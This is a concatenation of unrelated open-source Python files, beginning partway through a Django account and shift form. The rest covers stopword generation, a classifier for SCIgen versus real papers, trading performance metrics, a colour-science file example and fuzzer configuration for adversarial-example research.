url += default_token_generator.make_token(account) + "/"
html = render_to_string(
"email.html",
{
"url": url,
"message": f"{account.first_name}, activate your new account using the link below.",
"button": "Activate Account",
},
)
text = strip_tags(html).replace("Activate Account", url)
config = ConfigParser(interpolation=None)
config.read(settings.CONFIG_FILE)
backend = EmailBackend(
host=config.get("email", "EMAIL_HOST"),
port=config.getint("email", "EMAIL_PORT"),
username=config.get("email", "EMAIL_USER"),
password=config.get("email", "EMAIL_PASSWORD"),
use_tls=config.getboolean("email", "EMAIL_USE_TLS"),
)
try:
send_mail(
subject="Activate Account | Business Tracker",
message=text,
html_message=html,
from_email=config.get("email", "EMAIL_USER"),
recipient_list=(self.cleaned_data["email"],),
connection=backend,
)
return account
except SMTPException:
return False
class ShiftForm(forms.ModelForm):
duration = forms.CharField(
max_length=5, help_text="Must be formatted as HH:MM (00:00 - 16:00)"
)
class Meta:
model = Shift
exclude = ("worker",)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields["project"].empty_label = ""
if not self.initial.get("duration", None):
self.initial["duration"] = "00:00"
if not self.initial.get("date", None):
self.initial["date"] = datetime.date.today()
instance = getattr(self, "instance", None)
if instance and instance.pk and self.initial["duration"]:
hours = self.initial["duration"] // 3600
minutes = self.initial["duration"] % 3600 // 60
self.initial["duration"] = f"{hours:02d}:{minutes:02d}"
def clean_duration(self):
if len(self.cleaned_data["duration"]) != 5:
raise forms.ValidationError("Enter a valid duration.")
duration_str = self.cleaned_data["duration"].split(":")
if not (duration_str[0].isdecimal() and duration_str[1].isdecimal()):
raise forms.ValidationError("Enter a valid duration.")
self.cleaned_data["duration"] = (
int(duration_str[0]) * 3600 + int(duration_str[1]) * 60
)
if self.cleaned_data["duration"] not in range(60, 57601):
raise forms.ValidationError("Enter a valid duration.")
return self.cleaned_data["duration"]
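The `HH:MM` parsing in `clean_duration` above reduces to a small helper; a standalone sketch (`parse_duration` is a hypothetical name, not part of the form):

```python
def parse_duration(text):
    # "HH:MM" -> total seconds, mirroring clean_duration's arithmetic.
    hours, minutes = text.split(":")
    return int(hours) * 3600 + int(minutes) * 60

print(parse_duration("01:30"))  # 5400
```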
# File: src/stopwords/create_stopword_list.py (repo: prrao87/topic-modelling, license: MIT)
"""
Script to generate a custom list of stopwords that extends existing lists.
"""
import json
import spacy
from urllib.request import urlopen
from itertools import chain
def combine(*lists):
"Combine an arbitrary number of lists into a single list"
return list(chain(*lists))
def get_spacy_lemmas():
spacy_lemma_url = "https://raw.githubusercontent.com/explosion/spacy-lookups-data/master/spacy_lookups_data/data/en_lemma_lookup.json"
with urlopen(spacy_lemma_url) as response:
lemmas = response.read()
return json.loads(lemmas)
def lookup_verbs(roots, spacy_lemmas):
"""Return a full of list light verbs and all its forms"""
def flatten(list_of_lists):
"Return a flattened list of a list of lists"
return [item for sublist in list_of_lists for item in sublist]
verblist = []
for root in roots:
verbs = [key for key in spacy_lemmas if spacy_lemmas[key] == root]
verbs.append(root)
verblist.append(verbs)
return flatten(verblist)
if __name__ == "__main__":
# We first get the default spaCy stopword list
nlp = spacy.blank('en')
spacy_stopwords = nlp.Defaults.stop_words
spacy_lemmas = get_spacy_lemmas()
# Create custom lists depending on the class of words seen in the data
person_titles = ['mr', 'mrs', 'ms', 'dr', 'mr.', 'mrs.', 'ms.', 'dr.', 'e']
broken_words = ['don', 'isn', 'mustn', 'shouldn', 'couldn', 'doesn', 'didn']
numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '000']
url_terms = ['http', 'https', 'ref', 'href', 'com', 'src']
days_of_the_week = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday',
'saturday', 'sunday']
months_of_the_year = ['january', 'february', 'march', 'april', 'may', 'june', 'july',
'august', 'september', 'october', 'november', 'december']
time_periods = ['minute', 'minutes', 'hour', 'hours', 'day', 'days', 'week', 'weeks',
'month', 'months', 'year', 'years']
time_related = ['yesterday', 'today', 'tomorrow', 'day', 'night', 'morning',
'afternoon', 'evening', 'edt', 'est', 'time', 'times']
common_nouns = ['new', 'york', 'nytimes', 'press', 'news', 'report', 'page', 'user', 'file', 'video', 'pic',
'photo', 'online', 'social', 'media', 'group', 'inbox', 'item',
'advertisement', 'world', 'store', 'story', 'life', 'family',
'people', 'man', 'woman', 'friend', 'friends']
social_media = ['twitter', 'facebook', 'google', 'gmail', 'video', 'photo', 'image',
'user', 'social', 'media', 'page', 'online', 'stream', 'post',
'app']
light_verb_roots = [
'ask', 'come', 'go', 'know', 'look', 'see', 'talk', 'try', 'use', 'want', 'call', 'click',
'continue', 'comment', 'do', 'feel', 'find', 'give', 'get', 'have', 'include', 'like', 'live',
'love', 'make', 'post', 'read', 'say', 'speak', 'send', 'share', 'show', 'sign', 'tag',
'take', 'tell', 'think', 'update', 'work', 'write'
]
# Convert light verb roots to all its forms using lemma lookup
light_verbs_full = lookup_verbs(light_verb_roots, spacy_lemmas)
# Combine into a single lit of stopwords
add_stopwords = set(
combine(
person_titles, broken_words, numbers, url_terms, days_of_the_week, months_of_the_year,
time_periods, time_related, common_nouns, social_media, light_verbs_full
)
)
# Combine all stopwords into one list and export to text file
combined_stopwords = spacy_stopwords.union(add_stopwords)
stopword_list = sorted(list(combined_stopwords))
# Write out stopwords to file
with open('custom_stopwords.txt', 'w') as f:
for word in stopword_list:
f.write(word + '\n')
print(f"Exported {len(stopword_list)} words to stopword list.")
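A self-contained toy illustration of the lemma-inversion step used by `lookup_verbs`: the real script downloads spaCy's full (surface form, lemma) table, so a hypothetical mini table stands in here:

```python
def lookup_verbs(roots, spacy_lemmas):
    """Invert a (surface form -> lemma) table to expand each root verb."""
    verblist = []
    for root in roots:
        verbs = [key for key in spacy_lemmas if spacy_lemmas[key] == root]
        verbs.append(root)
        verblist.append(verbs)
    return [item for sublist in verblist for item in sublist]

# Hypothetical mini lemma table in place of en_lemma_lookup.json
toy_lemmas = {"went": "go", "goes": "go", "gone": "go", "ran": "run"}
print(sorted(lookup_verbs(["go"], toy_lemmas)))  # ['go', 'goes', 'gone', 'went']
```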
# --- setup.py (Lzejie/DynamicPool, MIT) ---
# -*- coding: utf-8 -*-
# @Time    : 18/12/10 10:27 AM
# @Author  : L_zejie
# @Site    :
# @File    : setup.py
# @Software: PyCharm Community Edition
from setuptools import setup, find_packages

setup(
    name="DynamicPool",
    packages=find_packages(),
    version='0.14',
    description="动态任务阻塞线程/进程池",  # "Dynamic task-blocking thread/process pool"
    author="L_zejie",
    author_email='lzj_xuexi@163.com',
    url="https://github.com/Lzejie/DynamicPool",
    license="MIT Licence",
    keywords=["Thread Pool", "Dynamic Pool", "Dynamic Thread Pool", "Dynamic Process Pool"],
    classifiers=[],
    install_requires=[]
)
# --- apps/track/migrations/0022_auto_20210319_1551.py (martinlehoux/django_bike, MIT) ---
# Generated by Django 3.1.7 on 2021-03-19 15:51
from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ("track", "0021_auto_20200915_1528"),
    ]

    operations = [
        migrations.RemoveField(
            model_name="track",
            name="parser",
        ),
        migrations.DeleteModel(
            name="Point",
        ),
    ]
# --- papers_clf/tfidf_2_sentence.py (KellyShao/Writing-robots-vs.-Human, CECILL-B) ---
import csv
import math
import pandas as pd
import numpy as np
from sklearn import svm
from sklearn.model_selection import train_test_split  # sklearn.cross_validation was removed in 0.20
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction import text
from sklearn import metrics
from sklearn.metrics import f1_score  # roc_curve/auc imports dropped: auc() is redefined below
import matplotlib.pyplot as plt
from gensim.models import word2vec
from gensim import corpora
from gensim.parsing.preprocessing import strip_numeric
from gensim.parsing.preprocessing import remove_stopwords
from gensim.parsing.preprocessing import strip_short
from gensim.parsing.preprocessing import strip_non_alphanum

stop_words = text.ENGLISH_STOP_WORDS.union([u'apr', u'archetypr', u'aug', u'configuration', u'conference', u'continuing'])  # estimate

sci_file = "cs_papers/sci_after_filter.csv"
scigen_file = "cs_papers/scigen_after_filter.csv"


def import_data(file, row_content, x):
    content = []
    label = []
    content_1 = open(file, 'r')
    csv_reader = csv.reader(content_1)
    for row in csv_reader:
        row_new = remove_stopwords(row[row_content])
        row_new = strip_numeric(row_new)
        # row_new = strip_non_alphanum(row_new)
        row_new = strip_short(row_new, minsize=3)
        content.append(row_new)
    length = len(content)
    for i in range(0, length):
        label.append(x)
    return content, label


sci_content, sci_label = import_data(sci_file, 1, 1)
scigen_content, scigen_label = import_data(scigen_file, 1, 0)
len1 = len(sci_content)
len2 = len(scigen_content)
data = sci_content + scigen_content
label = sci_label + scigen_label


def extract_sentence(content, percent):
    """Keep roughly the first `percent` fraction of each document's sentences."""
    new_content = []
    for line in content:
        new = line.split('.')
        new_filter = []
        for i in new:
            if len(i) > 15:  # drop very short fragments left over from the split
                new_filter.append(i)
        n_keep = math.ceil((len(new_filter) + 1) * percent)
        cnt = 0
        new_line = ''
        for sent in new_filter:
            cnt += 1
            if cnt <= n_keep:
                new_line = new_line + sent
        new_content.append(new_line)
    return new_content


def auc(content, label, cross_fold):
    f1_mean = np.zeros(20)
    for i in range(0, cross_fold):
        print('cross_v' + str(i))
        content_auto = content[0:928]
        content_human = content[928:1836]
        label_auto = label[0:928]
        label_human = label[928:1836]
        random_num = np.random.randint(low=0, high=100)
        print('random_num_auto:' + str(random_num))
        content_train_auto, content_test_auto, label_train_auto, label_test_auto = train_test_split(content_auto, label_auto, test_size=0.2, random_state=random_num)
        random_num = np.random.randint(low=0, high=100)
        print('random_num_human:' + str(random_num))
        content_train_human, content_test_human, label_train_human, label_test_human = train_test_split(content_human, label_human, test_size=0.2, random_state=random_num)
        content_train = content_train_auto + content_train_human
        content_test = content_test_auto + content_test_human
        label_train = label_train_auto + label_train_human
        label_test = label_test_auto + label_test_human
        vectorizer_train = TfidfVectorizer(encoding='utf-8', decode_error='ignore', strip_accents='unicode',
                                           token_pattern=u'(?ui)\\b\\w*[a-z]+\\w*\\b', stop_words=stop_words,
                                           lowercase=True, analyzer='word', max_features=100)  # ngram_range=(1,2),
        tfidf_train = vectorizer_train.fit_transform(content_train)
        word_train = vectorizer_train.get_feature_names()
        tfidf_metric_train = tfidf_train.toarray()
        vectorizer_test = TfidfVectorizer(encoding='utf-8', decode_error='ignore', strip_accents='unicode',
                                          token_pattern=u'(?ui)\\b\\w*[a-z]+\\w*\\b', stop_words=stop_words,
                                          lowercase=True, analyzer='word', vocabulary=vectorizer_train.vocabulary_)
        # build clf
        clf = svm.SVC(kernel='linear')  # , probability=True)
        clf_res = clf.fit(tfidf_train, label_train)
        # input sentence
        for percent in range(1, 101, 5):
            print('sentence' + str(percent * 0.01))
            new_content_test = extract_sentence(content_test, percent * 0.01)
            tfidf_test = vectorizer_test.fit_transform(new_content_test)
            word_test = vectorizer_test.get_feature_names()
            pred = clf_res.predict(tfidf_test)
            score_micro = f1_score(label_test, pred, average='micro')
            score_macro = f1_score(label_test, pred, average='macro')
            f1 = (score_macro + score_micro) / 2
            f1_mean[(percent - 1) // 5] += f1
    f1_mean = f1_mean / cross_fold
    # pred = clf_res.predict(tfidf_test)
    # predict_prob = clf_res.predict_proba(tfidf_test)[:, 1]
    # auc = metrics.roc_auc_score(label_test, pred)
    # print('auc: %0.20f' % auc)
    # auc_mean = auc_mean + auc
    # auc_mean = auc_mean / cross_fold
    x_axis = range(1, 21)
    x = np.array(x_axis)
    plt.plot(x, f1_mean)
    plt.show()
    print(f1_mean)
    f1_mean = list(f1_mean)
    f1_mean_csv = pd.DataFrame(f1_mean)
    f1_mean_csv.to_csv('f1/f1_tfidf_sentence.csv', mode='a', header=False)


auc(data, label, 10)
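A self-contained sketch of the `extract_sentence` truncation step (same filtering and ceiling logic as above, on a hypothetical toy document):

```python
import math

def extract_sentence(content, percent):
    """Keep roughly the first `percent` fraction of each document's sentences."""
    new_content = []
    for line in content:
        kept = [s for s in line.split('.') if len(s) > 15]  # drop short fragments
        n_keep = math.ceil((len(kept) + 1) * percent)
        new_content.append(''.join(kept[:n_keep]))
    return new_content

doc = "first sentence with words. second sentence with words. third sentence with words. tiny."
print(extract_sentence([doc], 0.5))  # keeps the first two of the three long sentences
```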
# --- auction/admin.py (AnthonyNicklin/newage-auctions, FSFAP) ---
from django.contrib import admin
from .models import Auction, Lot, Bid


class BidAdmin(admin.ModelAdmin):
    readonly_fields = (
        'user',
        'auction',
        'bid_amount',
        'bid_time',
    )


admin.site.register(Auction)
admin.site.register(Lot)
admin.site.register(Bid, BidAdmin)
# --- scale/source/apps.py (kaydoh/scale, Apache-2.0) ---
"""Defines the application configuration for the source application"""
from __future__ import unicode_literals

from django.apps import AppConfig


class SourceConfig(AppConfig):
    """Configuration for the source app
    """

    name = 'source'
    label = 'source'
    verbose_name = 'Source'

    def ready(self):
        """
        Override this method in subclasses to run code when Django starts.
        """

        # Register source file parse saver
        from job.configuration.data.data_file import DATA_FILE_PARSE_SAVER
        from source.configuration.source_data_file import SourceDataFileParseSaver
        DATA_FILE_PARSE_SAVER['DATA_FILE_PARSE_SAVER'] = SourceDataFileParseSaver()

        # Register source message types
        from messaging.messages.factory import add_message_type
        from source.messages.purge_source_file import PurgeSourceFile
        add_message_type(PurgeSourceFile)
# --- indicator17.py (nkzhengwt/Spyder_cta, MIT) ---
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import math
import datetime
import time
import matplotlib.pyplot as plt
import warnings

warnings.filterwarnings("ignore")


class Indicators():

    def __init__(self, dataframe, params=[]):
        self.dataframe = dataframe
        self.params = params
        self.dataframe['return'] = 0
        for i in range(1, len(dataframe['return'])):
            # http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
            dataframe.loc[i, 'return'] = (self.dataframe.loc[i, 'open'] - self.dataframe.loc[i - 1, 'open']) / self.dataframe.loc[i - 1, 'open']
        self.Return = dataframe['return']
        self.dataframe['time'] = dataframe['tradeDate']
        self.dataframe['cumulative_return'] = self.dataframe['open']
        self.dataframe['cumulative_return'] = self.dataframe['cumulative_return'] / self.dataframe.loc[0, 'open']
        self.dataframe['cumulative_return'] = dataframe['cumulative_return']  # *1000000
        self.dataframe.index = pd.to_datetime(dataframe['tradeDate'])
        # Split the data into per-year slices
        self.year_slice = {}
        i = 0
        y = time.strptime(self.dataframe['time'].iat[0], "%Y-%m-%d").tm_year
        for j in range(1, len(self.dataframe)):
            if y != time.strptime(self.dataframe['time'].iat[j], "%Y-%m-%d").tm_year:
                self.year_slice[str(y)] = dataframe[i:j - 1]
                y = time.strptime(self.dataframe['time'].iat[j], "%Y-%m-%d").tm_year
                i = j
        self.year_slice[str(y)] = dataframe[i:]

    ### Annualized return
    def annual_return(self, asset, year):
        R = self.year_slice[year][asset].iat[-1] / self.year_slice[year][asset].iat[0]
        t1 = time.strptime(self.year_slice[year]['time'].iat[0], "%Y-%m-%d")
        t2 = time.strptime(self.year_slice[year]['time'].iat[-1], "%Y-%m-%d")
        d1 = datetime.datetime(t1.tm_year, t1.tm_mon, t1.tm_mday)
        d2 = datetime.datetime(t1.tm_year, t2.tm_mon, t2.tm_mday)
        n = (d2 - d1).days
        n = n / 244
        # print('The annual return for %s in %s is %f' % (asset, year, math.pow(R, 1 / n) - 1))
        return math.pow(R, 1 / n) - 1

    ### Maximum drawdown
    def max_draw(self, asset, year):
        df = self.year_slice[year]
        # Running maximum of the asset curve (replaces the original .ix loop,
        # which no longer works on modern pandas)
        df['max'] = np.maximum.accumulate(df[asset].to_numpy())
        df['retreat'] = (df[asset] - df['max']) / df['max']
        print('The max draw for %s in %s is %f' % (asset, year, abs(min(df['retreat']))))
        return abs(min(df['retreat']))

    ### Volatility
    def volatility(self, asset, year):
        vol = np.std(self.year_slice[year][asset]) * math.sqrt(244 / len(self.year_slice[year][asset]))
        print('The volatility for %s in %s is %f' % (asset, year, vol))
        return vol

    ### Sharpe ratio
    def sharp(self, asset, no_risk_R, year):
        ratio = (self.annual_return(asset, year) - no_risk_R) / (self.volatility(asset, year) * math.sqrt(244 / len(self.year_slice[year][asset])) + 1e-10)
        print('The Sharp Ratio for %s in %s is %.7f' % (asset, year, ratio))
        return ratio

    ### Calmar ratio
    def calmar(self, asset, year):
        ratio = self.annual_return(asset, year) / self.max_draw(asset, year)
        print('The Calmar Ratio for %s in %s is %f' % (asset, year, ratio))
        return ratio

    ### Daily win ratio
    def daily_win_ratio(self, asset, year):
        # DataFrame conditional selection is self.dataframe[self.dataframe[asset] > 0][asset],
        # not self.dataframe[asset][self.dataframe[asset] > 0]
        pnl = asset.replace('asset', 'pnl')
        n1 = len(self.year_slice[year][self.year_slice[year][pnl] > 0][pnl])
        n2 = len(self.year_slice[year][pnl])
        print('The daily win ratio for %s in %s is %f' % (asset, year, n1 / n2))
        return n1 / n2

    ### Daily win/loss ratio
    def win_lose_ratio(self, asset, year):
        df = self.year_slice[year]
        df['dif'] = df[asset] - df[asset].shift(1)
        ratio = abs(sum(df[df['dif'] > 0]['dif'])) / abs(sum(df[df['dif'] < 0]['dif']))
        print('The win lose ratio for %s in %s is %f' % (asset, year, ratio))  # original printed 'retreat' by mistake
        return ratio

    ### Worst drawdown interval
    def worst_draw_interval(self, asset, year):
        df = self.year_slice[year]
        values = df[asset].to_numpy()
        max_vals = np.maximum.accumulate(values)  # running maximum
        df['max'] = max_vals
        # Carry forward the date on which the running maximum was last set
        max_time = list(df['time'])
        for i in range(1, len(values)):
            if values[i] <= max_vals[i - 1]:
                max_time[i] = max_time[i - 1]
        df['max_time'] = max_time
        df['retreat'] = (df[asset] - df['max']) / df['max']
        max_draw = min(df['retreat'])
        data = df[df['retreat'] == max_draw]
        t1 = data['tradeDate']
        t2 = data['max_time']
        # print('The worst draw interval for %s in %s is %s %s' % (asset, year, str(t1), str(t2)))
        return t1, t2

    ### Total turnover
    def total_turnover(self, asset, year):
        turnover = asset.replace('asset', 'turnover')
        total = sum(self.year_slice[year][turnover])
        print('The total turnover for %s in %s is %f' % (asset, year, total))
        return total

    ### Average daily turnover
    def average_daily_turnover(self, asset, year):
        t1 = time.strptime(self.year_slice[year]['time'].iat[0], "%Y-%m-%d")
        t2 = time.strptime(self.year_slice[year]['time'].iat[-1], "%Y-%m-%d")
        d1 = datetime.datetime(t1.tm_year, t1.tm_mon, t1.tm_mday)
        d2 = datetime.datetime(t1.tm_year, t2.tm_mon, t2.tm_mday)
        n = (d2 - d1).days
        avg = self.total_turnover(asset, year) / n
        print('The average daily turnover for %s in %s is %f' % (asset, year, avg))
        return avg

    ### Average daily position
    def average_daily_position(self, asset, year):
        position = asset.replace('asset', 'position')
        mean_pos = self.year_slice[year][position].mean()
        print('The average daily position for %s in %s is %f' % (asset, year, mean_pos))
        return mean_pos

    ### Average return per trade
    def minor_average_return(self, asset, year):
        position = asset.replace('asset', 'position')
        sum_pos = sum(self.year_slice[year][self.year_slice[year][position] != 0][position])
        num = len(self.year_slice[year][self.year_slice[year][position] != 0][position])
        print('The minor average return for %s in %s is %f' % (asset, year, sum_pos / num))
        return sum_pos / num

    def write_indicators_concat(self, path):
        frames = []
        for items in self.year_slice:
            temp_data = []
            temp_index = []
            for k in self.params:
                x = [items,
                     self.annual_return('asset' + str(k), items),
                     self.max_draw('asset' + str(k), items),
                     self.volatility('asset' + str(k), items),
                     self.sharp('asset' + str(k), 0, items),
                     self.calmar('asset' + str(k), items),
                     self.daily_win_ratio('asset' + str(k), items),
                     self.win_lose_ratio('asset' + str(k), items),
                     self.total_turnover('asset' + str(k), items),
                     self.average_daily_turnover('asset' + str(k), items),
                     self.average_daily_position('asset' + str(k), items),
                     self.minor_average_return('asset' + str(k), items)]
                temp_data.append(x)
                temp_index.append('asset' + str(k))
            DataFrame = pd.DataFrame(temp_data, index=temp_index,
                                     columns=['year', 'annual_return', 'max_draw', 'volatility', 'sharp',
                                              'calmar', 'daily_win_ratio', 'win_lose_ratio', 'total_turnover',
                                              'average_daily_turnover', 'average_daily_position',
                                              'minor_average_return'])
            frames.append(DataFrame)
        DataFrame = pd.concat(frames)
        DataFrame.to_csv(path_or_buf=path)

    def plot_figure(self, asset_num):
        t1 = time.strptime(self.dataframe['time'].iat[0], "%Y-%m-%d")
        t2 = time.strptime(self.dataframe['time'].iat[-1], "%Y-%m-%d")
        d1 = datetime.datetime(t1.tm_year, t1.tm_mon, t1.tm_mday)
        d2 = datetime.datetime(t1.tm_year, t2.tm_mon, t2.tm_mday)
        plt.figure()
        plt.subplots_adjust(hspace=1, wspace=1)
        plt.subplot(3, 1, 1)
        self.dataframe['asset' + str(asset_num)].plot(legend=True)
        self.dataframe['cumulative_return'].plot(kind='line', use_index=True, legend=True)
        plt.subplot(3, 1, 2)
        f2 = plt.bar(range(len(self.dataframe['transaction' + str(asset_num)])),
                     self.dataframe['transaction' + str(asset_num)].tolist(),
                     tick_label=None, label='transaction' + str(asset_num))
        plt.legend((f2,), ('transaction' + str(asset_num),))
        plt.subplot(3, 1, 3)
        f3 = plt.bar(range(len(self.dataframe['pnl' + str(asset_num)])),
                     self.dataframe['pnl' + str(asset_num)].tolist(),
                     label='pnl' + str(asset_num))
        plt.legend((f3,), ('pnl' + str(asset_num),))
        plt.show()


if __name__ == '__main__':
    # Indicators expects a DataFrame; the original passed the CSV path directly
    indicators = Indicators(pd.read_csv('/Users/zhubaobao/Documents/Quant/ZXJT/total3.csv'), [5, 10, 20])
    # indicators.write_indicators_concat('/Users/zhubaobao/Documents/Quant/ZXJT/write_indicators.csv')
    indicators.plot_figure(10)
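The running-maximum drawdown logic inside `max_draw` can be checked on a plain Python list (toy prices, hypothetical values, no pandas required):

```python
prices = [100, 110, 105, 120, 90, 95]

# Running maximum of the price series
running_max = []
for p in prices:
    running_max.append(p if not running_max else max(running_max[-1], p))

# Drawdown relative to the running maximum; the worst value is the max drawdown
retreat = [(p - m) / m for p, m in zip(prices, running_max)]
max_drawdown = abs(min(retreat))
print(max_drawdown)  # 0.25, i.e. the 120 -> 90 drop
```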
# --- colour/examples/io/examples_ies_tm2714.py (BPearlstine/colour, BSD-3-Clause) ---
# -*- coding: utf-8 -*-
"""
Showcases input / output examples for *IES TM-27-14* spectral data XML files.
"""
import os
import colour
from colour.utilities import message_box
RESOURCES_DIRECTORY = os.path.join(os.path.dirname(__file__), 'resources')
message_box('"IES TM-27-14" Spectral Data "XML" File IO')
message_box('Reading spectral data from "IES TM-27-14" "XML" file.')
sd = colour.SpectralDistribution_IESTM2714(
    os.path.join(RESOURCES_DIRECTORY, 'TM27 Sample Spectral Data.spdx'))
sd.read()
print(sd)
print('\n')
message_box('"IES TM-27-14" spectral data "XML" file header:')
print('Manufacturer: {0}'.format(sd.header.manufacturer))
print('Catalog Number: {0}'.format(sd.header.catalog_number))
print('Description: {0}'.format(sd.header.description))
print('Document Creator: {0}'.format(sd.header.document_creator))
print('Unique Identifier: {0}'.format(sd.header.unique_identifier))
print('Measurement Equipment: {0}'.format(sd.header.measurement_equipment))
print('Laboratory: {0}'.format(sd.header.laboratory))
print('Report Number: {0}'.format(sd.header.report_number))
print('Report Date: {0}'.format(sd.header.report_date))
print('Document Creation Date: {0}'.format(sd.header.document_creation_date))
print('Comments: {0}'.format(sd.header.comments))
print('\n')
message_box('"IES TM-27-14" spectral data "XML" file spectral distribution:')
print('Spectral Quantity: {0}'.format(sd.spectral_quantity))
print('Reflection Geometry: {0}'.format(sd.reflection_geometry))
print('Transmission Geometry: {0}'.format(sd.transmission_geometry))
print('Bandwidth FWHM: {0}'.format(sd.bandwidth_FWHM))
print('Bandwidth Corrected: {0}'.format(sd.bandwidth_corrected))
print('\n')
message_box('"IES TM-27-14" spectral data "XML" file spectral data:')
print(sd)
# --- python/constants.py (cbilstra/FATE, MIT) ---
import os
from os.path import join
INVESTIGATE = False # Records coverages and saves them. Generates a plot in the end. Do not use with automate.
TEST_OUTSIDE_FUZZER = False # Runs FATE as standalone (1+1) EA
BLACKBOX = True and TEST_OUTSIDE_FUZZER # Disables white-box information such as thresholds and feat imp.
FORCE_DEFAULT_EPSILON = True or TEST_OUTSIDE_FUZZER # Runs all datasets with the default epsilon
FORCE_DEFAULT_MUTATION_CHANCE = False or TEST_OUTSIDE_FUZZER # Runs all datasets with the default mutation chance
LIMIT_TIME = True # If false, run 10 times as long
############ FATE Standalone ############
CROSSOVER_CHANCE = 0.001 # Chance that crossover occurs
CROSSOVER_RANDOM_CHANCE = 1.0 # Actual chance for crossover with random features is 0.001
# CROSSOVER_CHANCE * CROSSOVER_RANDOM_CHANCE
NUM_RUNS = 100000000 # Unlimited. Change for smaller amount of runs
POPULATION_SIZE = 1 # Population size.
############ RQ 1 defaults ############
MEASURE_EXEC_P_S = True # Parse the number of executions per second.
ALLOW_FLOAT_MIS_CLASSIFICATION = True # If True, do not filter mis-classifications from the produced AE
CONSISTENT_DRAWS = True # Seeds random with 0, to create consistent check-set draws
FUZZ_ONE_POINT_PER_INSTANCE = True # compile to generic fuzz target and fuzz per point
USE_CUSTOM_MUTATOR = True # If False, use the standard mutator of LibFuzzer
USE_CROSSOVER = True and USE_CUSTOM_MUTATOR # Combines mutation with crossover (split at random location)
USE_GAUSSIAN = True # Gaussian vs random uniform mutation
USE_PROBABILITY_STEPS_SPECIAL = True # Proba descent based on small proba diff between 2nd class predicted
PROBA_LIMIT_WITHIN_EPSILON = True # Only save seeds if within epsilon
WRITE_AE_ONLY_IF_BETTER_OUTSIDE_BRANCHES = True # Saves execution time
ALWAYS_OPTIMIZE = True # Otherwise only optimize small files
MUTATE_DEPTH = 7 if TEST_OUTSIDE_FUZZER else 5 # The maximum number of consecutive mutations per seed for LibFuzzer
DEFAULT_EPSILON = 0.1 if TEST_OUTSIDE_FUZZER else 0.2 # Default epsilon
DEFAULT_MUTATE_CHANCE = 0.5 if TEST_OUTSIDE_FUZZER else 0.1 # Chance that a single features is mutated
FUZZER = 'libFuzzer'
# FUZZER = 'AFL++'
# FUZZER = 'honggfuzz'
# FUZZER = 'AFLGo'
FUZZERS = ['libFuzzer', 'AFL++', 'AFLGo', 'honggfuzz']
if FUZZER not in FUZZERS:
    raise ValueError(f'Fuzzer {FUZZER} not recognised, should be one of [{", ".join(FUZZERS)}]')
if FUZZER == 'honggfuzz' and USE_CUSTOM_MUTATOR:
    raise ValueError('Honggfuzz and custom mutator is not supported')
############ RQ 2 defaults ############
AE_MUTATE_TOWARDS_VICTIM = True # If AE, mutate values only towards victim point.
MUTATE_BIGGEST_CHANCE = 0.5 # When an AE is found, the chance to only mutate all biggest difference fs towards victim
ALSO_MUTATE_BIGGEST = True # Always mutate all features > the biggest l-inf distance - 0.01. Only with FUZZ_ONE
# These alter the chance that a feature is mutated
BIAS_MUTATE_BIG_DIFFS = True
USE_THRESHOLDS_FOR_MUTATION = True and not BLACKBOX # move to optimal boundary value after drawing from mutation dist
# Fuzzes for each datapoint with and without AE init
DOUBLE_FUZZ_WITH_AE = True and not (TEST_OUTSIDE_FUZZER or INVESTIGATE)
USE_FEATURE_IMPORTANCE = True and not BLACKBOX # prioritize more important features for mutation
INITIALIZE_WITH_POINT_IN_BETWEEN = True and DOUBLE_FUZZ_WITH_AE
INITIALIZE_WITH_EXTRA_POINTS_IN_BETWEEN = True and INITIALIZE_WITH_POINT_IN_BETWEEN
if TEST_OUTSIDE_FUZZER and (not FUZZ_ONE_POINT_PER_INSTANCE):
    raise ValueError('Test outside fuzzer conflicting options')
if TEST_OUTSIDE_FUZZER and DOUBLE_FUZZ_WITH_AE and (POPULATION_SIZE < 2 or CROSSOVER_RANDOM_CHANCE > 0.99):
    raise ValueError('Test outside fuzzer double fuzz configuration problem')
############ RQ 1.2 defaults ############
FILTER_BAD_AE = True # If True, discards all AE that are worse than FAILURE_THRES
FUZZ_ONLY_COV_FOR_FOREST = False # Only insert coverage-guidance for the lines that belong to the Forest
FUZZ_ONLY_COV_FOR_CHECK = True # Only insert coverage-guidance for the lines that belong to the objective function
FUZZ_WITHOUT_COVERAGE_GUIDANCE = False # If True, baseline: removes almost all coverage guidance (except TestOneInput)
if FUZZER == 'AFL++' and FUZZ_WITHOUT_COVERAGE_GUIDANCE:
raise ValueError('AFL++ crashes because the fuzzer name cannot be set with the -n (no instrument) option')
############ Objective function settings ############
COMBINE_DISTANCE_AND_PROBABILITY = False # distance = distance + probability
USE_PROBABILITY_STEPS = False # probability steps in the check function ELSE branch
PROBA_SPECIAL_ALWAYS = False
PROBA_SPECIAL_START_STEP = 0.2
PROBA_SPECIAL_STEP_SIZE = 0.01
WRITE_AE_ALWAYS_IN_IF = False # Slower option for the objective function
if USE_PROBABILITY_STEPS and USE_PROBABILITY_STEPS_SPECIAL:
raise ValueError('Select at most one type of probability step')
if WRITE_AE_ALWAYS_IN_IF and WRITE_AE_ONLY_IF_BETTER_OUTSIDE_BRANCHES:
    raise ValueError('Only one WRITE_AE_* option can be enabled in the settings')
############ Fuzzer settings ############
NEVER_OPTIMIZE = False
FORCE_ENTROPIC = False # libfuzzer. Experimental. Enables entropic power schedule.
NO_ENTROPIC = False
FOCUS_FUNCTION = "0" # libFuzzer -focus_function. Experimental. Fuzzing will focus on inputs that trigger
# calls to this function. If -focus_function=auto and -data_flow_trace is used, libFuzzer will choose the
# focus functions automatically.
if sum([FUZZ_WITHOUT_COVERAGE_GUIDANCE, FUZZ_ONLY_COV_FOR_CHECK, FUZZ_ONLY_COV_FOR_FOREST]) > 1:
raise ValueError('Only one coverage guidance option can be used at the same time')
if NEVER_OPTIMIZE and ALWAYS_OPTIMIZE:
raise ValueError('Conflicting optimize options')
############ AFL settings ############
# TIME_NO_NEW_COV = 10
IS_AE_CHANCE = 0.5 # Because we cannot access the fuzzer logic in the mutator
NUM_CYCLES_IN_LOOP = 1000 # Number of consecutive iterations after which we start with a clean sheet
AFL_USE_DICT = True and not USE_CUSTOM_MUTATOR
